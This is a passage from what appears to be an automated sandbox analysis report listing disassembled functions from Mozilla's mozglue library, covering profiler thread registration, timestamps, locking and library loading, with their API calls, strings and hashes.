Part of subcall function 6C665E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C665E9D
Part of subcall function 6C665E60: GetCurrentThreadId.KERNEL32 ref: 6C665EAB
Part of subcall function 6C665E60: GetCurrentThreadId.KERNEL32 ref: 6C665EB8
Part of subcall function 6C665E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C665ECF
Part of subcall function 6C665E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C665F27
Part of subcall function 6C665E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C665F47
Part of subcall function 6C665E60: GetCurrentProcess.KERNEL32 ref: 6C665F53
Part of subcall function 6C665E60: GetCurrentThread.KERNEL32 ref: 6C665F5C
Part of subcall function 6C665E60: GetCurrentProcess.KERNEL32 ref: 6C665F66
Part of subcall function 6C665E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C665F7E

free.MOZGLUE(?), ref: 6C69F9C5
free.MOZGLUE(?), ref: 6C69F9DA

Strings

[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C69F9A6
Thread , xrefs: 6C69F789
[D %d/%d] profiler_register_thread(%s), xrefs: 6C69F71F
" attempted to re-register as ", xrefs: 6C69F858

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
API String ID: 882766088-1834255612
Opcode ID: b1212e13894a61565bf873e0a71522ff3f24380dbdd5ad14f6d00f76d55e6a09
Instruction ID: ac30982e706685506d0b69bd6c31d6219e903b9dfed3c3e8203c429b5339d853
Opcode Fuzzy Hash: b1212e13894a61565bf873e0a71522ff3f24380dbdd5ad14f6d00f76d55e6a09
Instruction Fuzzy Hash: 908106716042019FDB10DF25C880AAEB7B5EFC6308F55456DE8499BB51EB30E849CBAF

Function 6C69EE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
Part of subcall function 6C699420: __Init_thread_footer.LIBCMT ref: 6C69949F

GetCurrentThreadId.KERNEL32 ref: 6C69EE60
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69EE6D
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69EE92
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C69EEA5
CloseHandle.KERNEL32(?), ref: 6C69EEB4
free.MOZGLUE(00000000), ref: 6C69EEBB
GetCurrentThreadId.KERNEL32 ref: 6C69EEC7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C69EECF

Part of subcall function 6C69DE60: GetCurrentThreadId.KERNEL32 ref: 6C69DE73
Part of subcall function 6C69DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C664A68), ref: 6C69DE7B
Part of subcall function 6C69DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C664A68), ref: 6C69DEB8
Part of subcall function 6C69DE60: free.MOZGLUE(00000000,?,6C664A68), ref: 6C69DEFE
Part of subcall function 6C69DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C69DF38

Part of subcall function 6C68CBE8: GetCurrentProcess.KERNEL32(?,6C6531A7), ref: 6C68CBF1
Part of subcall function 6C68CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6531A7), ref: 6C68CBFA

GetCurrentThreadId.KERNEL32 ref: 6C69EF1E
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69EF2B
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69EF59
GetCurrentThreadId.KERNEL32 ref: 6C69EFB0
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69EFBD
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69EFE1
GetCurrentThreadId.KERNEL32 ref: 6C69EFF8
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C69F000

Part of subcall function 6C6994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6994EE
Part of subcall function 6C6994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C699508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C69F02F

Part of subcall function 6C69F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C69F09B
Part of subcall function 6C69F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C69F0AC
Part of subcall function 6C69F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C69F0BE

Strings

[I %d/%d] profiler_pause, xrefs: 6C69F008
[I %d/%d] profiler_stop, xrefs: 6C69EED7

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
API String ID: 16519850-1833026159
Opcode ID: 50cf38773bf96c03438fd58e1a0dbcecab98bc745bc5edc233a6154d42347645
Instruction ID: 54bae6752647e8a262a5c2443303edca6c75c1bed4f4c2427930dd117207f867
Opcode Fuzzy Hash: 50cf38773bf96c03438fd58e1a0dbcecab98bc745bc5edc233a6154d42347645
Instruction Fuzzy Hash: EC5126316002129FDB005F66D8887A97BB4FF8B36DF14456AE91683B42DB747805CBAF

Function 6C665E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C665E9D

Part of subcall function 6C675B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6756EE,?,00000001), ref: 6C675B85
Part of subcall function 6C675B50: EnterCriticalSection.KERNEL32(6C6DF688,?,?,?,6C6756EE,?,00000001), ref: 6C675B90
Part of subcall function 6C675B50: LeaveCriticalSection.KERNEL32(6C6DF688,?,?,?,6C6756EE,?,00000001), ref: 6C675BD8
Part of subcall function 6C675B50: GetTickCount64.KERNEL32 ref: 6C675BE4

GetCurrentThreadId.KERNEL32 ref: 6C665EAB
GetCurrentThreadId.KERNEL32 ref: 6C665EB8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C665ECF
memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C666017

Part of subcall function 6C654310: moz_xmalloc.MOZGLUE(00000010,?,6C6542D2), ref: 6C65436A
Part of subcall function 6C654310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C6542D2), ref: 6C654387

moz_xmalloc.MOZGLUE(00000004), ref: 6C665F47
GetCurrentProcess.KERNEL32 ref: 6C665F53
GetCurrentThread.KERNEL32 ref: 6C665F5C
GetCurrentProcess.KERNEL32 ref: 6C665F66
DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C665F7E
moz_xmalloc.MOZGLUE(00000024), ref: 6C665F27

Part of subcall function 6C66CA10: mozalloc_abort.MOZGLUE(?), ref: 6C66CAA2

moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6655E1), ref: 6C665E8C

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6655E1), ref: 6C66605D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6655E1), ref: 6C6660CC

Strings

GeckoMain, xrefs: 6C665ECE, 6C666015

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
String ID: GeckoMain
API String ID: 3711609982-966795396
Opcode ID: 211275ea6b9994ee602de484c5dd006bb7ae7fee4f0c774230fc7d995417a863
Instruction ID: 2cd89fd41bcb337c7bb41e7ff879147b1e396609699be3e1535cb98365efdae5
Opcode Fuzzy Hash: 211275ea6b9994ee602de484c5dd006bb7ae7fee4f0c774230fc7d995417a863
Instruction Fuzzy Hash: 6371BFB06047409FD710DF2AD480A6ABBF0FF8A304F54496DE58687F52D731E948CB9A

Function 6C669590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6531C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C653217
Part of subcall function 6C6531C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C653236
Part of subcall function 6C6531C0: FreeLibrary.KERNEL32 ref: 6C65324B
Part of subcall function 6C6531C0: __Init_thread_footer.LIBCMT ref: 6C653260
Part of subcall function 6C6531C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C65327F
Part of subcall function 6C6531C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C65328E
Part of subcall function 6C6531C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6532AB
Part of subcall function 6C6531C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6532D1
Part of subcall function 6C6531C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C6532E5
Part of subcall function 6C6531C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C6532F7

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C669675
__Init_thread_footer.LIBCMT ref: 6C669697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C6696E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C669707
__Init_thread_footer.LIBCMT ref: 6C66971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C669773
GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C6697B7
FreeLibrary.KERNEL32 ref: 6C6697D0
FreeLibrary.KERNEL32 ref: 6C6697EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C669824

Strings

Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C669670
MapViewOfFileNuma2, xrefs: 6C6697B1
NtMapViewOfSection, xrefs: 6C669701
ntdll.dll, xrefs: 6C6696E3

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 3361784254-3880535382
Opcode ID: fd55bb060ca324fad644d0592b8733138f23f4a485bfe4bfee0cdb20c0154ef6
Instruction ID: 99e33e289692ab79beea46c92a1b769f038b8cec121decf90c14e6842b775f47
Opcode Fuzzy Hash: fd55bb060ca324fad644d0592b8733138f23f4a485bfe4bfee0cdb20c0154ef6
Instruction Fuzzy Hash: AF61B0716002069BDF008F67E8D4BDA7BB1EB8A358F118529ED1597B80D770B854CBAF

Function 6C6B6660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6C6DF618), ref: 6C6B6694
GetThreadId.KERNEL32(?), ref: 6C6B66B1
GetCurrentThreadId.KERNEL32 ref: 6C6B66B9
memset.VCRUNTIME140(?,00000000,00000100), ref: 6C6B66E1
EnterCriticalSection.KERNEL32(6C6DF618), ref: 6C6B6734
GetCurrentProcess.KERNEL32 ref: 6C6B673A
LeaveCriticalSection.KERNEL32(6C6DF618), ref: 6C6B676C
GetCurrentThread.KERNEL32 ref: 6C6B67FC
memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C6B6868
RtlCaptureContext.NTDLL ref: 6C6B687F

Strings

WalkStack64, xrefs: 6C6B6890

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
String ID: WalkStack64
API String ID: 2357170935-3499369396
Opcode ID: e7da402c09b6af611a02b9743e00f820c7f47792369de1c6150b12d6e61423fe
Instruction ID: 046c4d9724e0885745c9a256f4235ce348d1688609555383b529b970b5b0e2ec
Opcode Fuzzy Hash: e7da402c09b6af611a02b9743e00f820c7f47792369de1c6150b12d6e61423fe
Instruction Fuzzy Hash: 1151ED71A09301AFDB15CF25C884B9ABBF4FF89714F00492DF999A7640D770E918CB9A

Function 6C69DE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
Part of subcall function 6C699420: __Init_thread_footer.LIBCMT ref: 6C69949F

GetCurrentThreadId.KERNEL32 ref: 6C69DE73
GetCurrentThreadId.KERNEL32 ref: 6C69DF7D
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69DF8A
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69DFC9
GetCurrentThreadId.KERNEL32 ref: 6C69DFF7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C69E000
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C664A68), ref: 6C69DE7B

Part of subcall function 6C6994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6994EE
Part of subcall function 6C6994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C699508

Part of subcall function 6C68CBE8: GetCurrentProcess.KERNEL32(?,6C6531A7), ref: 6C68CBF1
Part of subcall function 6C68CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6531A7), ref: 6C68CBFA

?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C664A68), ref: 6C69DEB8
free.MOZGLUE(00000000,?,6C664A68), ref: 6C69DEFE
?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C69DF38

Strings

[I %d/%d] locked_profiler_stop, xrefs: 6C69DE83
<none>, xrefs: 6C69DFD7
[I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C69E00E

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
API String ID: 1281939033-809102171
Opcode ID: 2fcca3c07977d64dd4993d632918e94227168705532684585624f7cb7a8fc6a2
Instruction ID: 601b910b7b33fabe0a9ab561ffd34791e6424384c40c8e5f7151f0789e36a508
Opcode Fuzzy Hash: 2fcca3c07977d64dd4993d632918e94227168705532684585624f7cb7a8fc6a2
Instruction Fuzzy Hash: BC41D6357011129BDB109F66D8447AE7775EF8631DF144025E90A97B42CB71B806CBEF

Function 6C6AD4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6AD4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6AD4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6AD52A
GetCurrentThreadId.KERNEL32 ref: 6C6AD530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6AD53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6AD55F
free.MOZGLUE(00000000), ref: 6C6AD585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C6AD5D3
GetCurrentThreadId.KERNEL32 ref: 6C6AD5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6AD605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6AD652
GetCurrentThreadId.KERNEL32 ref: 6C6AD658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6AD667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6AD6A2

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: 3eed7c8b0298ade49de783b97f8103c59495be1610462d0a48e51c192460f2e1
Instruction ID: 9b8953e07197604a31493b0d65dd3307c99482accd72b78eb2f8161ceeed3414
Opcode Fuzzy Hash: 3eed7c8b0298ade49de783b97f8103c59495be1610462d0a48e51c192460f2e1
Instruction Fuzzy Hash: EE516C71604705DFC704DF65C484A9ABBF4FF8A358F108A2EE95A87710DB30B945CB99

Function 6C675670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C6756D1
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6756E9
?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C6756F1
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C675744
??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C6757BC
GetTickCount64.KERNEL32 ref: 6C6758CB
EnterCriticalSection.KERNEL32(6C6DF688), ref: 6C6758F3
__aulldiv.LIBCMT ref: 6C675945
LeaveCriticalSection.KERNEL32(6C6DF688), ref: 6C6759B2
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C6DF638,?,?,?,?), ref: 6C6759E9

Strings

MOZ_APP_RESTART, xrefs: 6C6756CC

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
String ID: MOZ_APP_RESTART
API String ID: 2752551254-2657566371
Opcode ID: c6b1ea9104754a8ef7f34416b2b9287e3d37f0b01403dc47f43a0f3bf1e0d967
Instruction ID: 8a5d3d28f3501d48136d047c39752d816cf1a815167c03ec0a4cbd8a9897a4dd
Opcode Fuzzy Hash: c6b1ea9104754a8ef7f34416b2b9287e3d37f0b01403dc47f43a0f3bf1e0d967
Instruction Fuzzy Hash: 05C17C31A083809FDB15CF29C48066AF7F1BFCA714F158A5DF8C497A60D730A985CB9A

Function 6C69EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
Part of subcall function 6C699420: __Init_thread_footer.LIBCMT ref: 6C69949F

GetCurrentThreadId.KERNEL32 ref: 6C69EC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C69EC8C

Part of subcall function 6C6994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6994EE
Part of subcall function 6C6994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C699508

GetCurrentThreadId.KERNEL32 ref: 6C69ECA1
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69ECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C69ECC5
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69ED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C69ED19
CloseHandle.KERNEL32(?), ref: 6C69ED28
free.MOZGLUE(00000000), ref: 6C69ED2F
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69ED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6C69EC94

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: 6f752f8e038e371429242f7d7bed7329dc5222a32dc293cb44beca4bad8acc52
Instruction ID: 2ae2e6adba9c6c1c82c3a60dad5285ffbeb87b2139405902274e78f0153f2d9b
Opcode Fuzzy Hash: 6f752f8e038e371429242f7d7bed7329dc5222a32dc293cb44beca4bad8acc52
Instruction Fuzzy Hash: 1C21E575600106AFDF009F26DC44A9A3779FF8636DF144210FD1897745DB31A80ACBAE

Function 6C698ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON

Download Yara Rule

APIs

Part of subcall function 6C65EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C65EB83

